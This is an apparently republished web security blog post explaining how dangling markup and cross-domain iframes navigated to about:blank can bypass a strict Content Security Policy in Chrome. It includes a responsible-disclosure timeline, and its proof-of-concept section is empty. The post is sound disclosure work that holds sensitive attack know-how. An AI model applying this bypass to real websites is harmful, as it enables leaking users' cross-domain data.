Bypassing CSP with dangling iframes

by Prapattimynk, Monday, 11 September 2023 (6 months ago)
Bypassing CSP with dangling iframes


Showing iframe screenshots dangling from strings

Introduction

Our Web Security Academy has a topic on dangling markup injection – a technique for exploiting sites protected by CSP. But something interesting happened when we came to update to Chrome 97 – because one of our interactive labs mysteriously stopped working. When we originally made this lab, Chrome prevented dangling markup-based attacks by looking for raw whitespace followed by “<" characters - but forgot to prevent background attributes (as discovered by Masato Kinugawa). 

Unfortunately, from Chrome 97 this technique no longer worked, so I was tasked to try and find an alternative. I tried many different attributes and CSS-based animations to delay assignments to try and bypass this protection. They all failed – it appears the force is strong with Mike West, who authored this change.

I took a step back and analysed the CSP:

default-src 'self';object-src 'none'; style-src 'self'; script-src 'self'; img-src *;

This looks watertight, right (apart from the img-src)? What if I told you that you could remove the ‘img-src’ directive and yet still conduct a dangling markup attack without a click? Let’s see how …

Cross domain iframe issues

First I fired up the Hackability inspector which is a security-focussed enumerator I coded a while back and began to dissect the inner workings of iframes. The Inspector is convenient for testing multiple domains for cross-domain leaks. I added the first iframe and inside that instance, I added another iframe:

Proof of concept

Conclusion

CSP treats about:blank URLs as the same origin – however when an attacker sets a cross domain iframe to about:blank, it becomes readable by an attacker and is definitely not the same origin. The Chrome mitigations for dangling markup attacks prevent some attacks, but by abusing browser quirks, it’s possible to sidestep those mitigations and gain access to cross domain information via an injection – even with JavaScript disabled in your CSP.

Timeline

2022-02-10 08:55 AM GMT – Reported bug to Google
2022-02-10 09:38 AM GMT – Reported to Mozilla
2022-06-14 15:00 PM GMT – Published this post

Back to all articles



Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.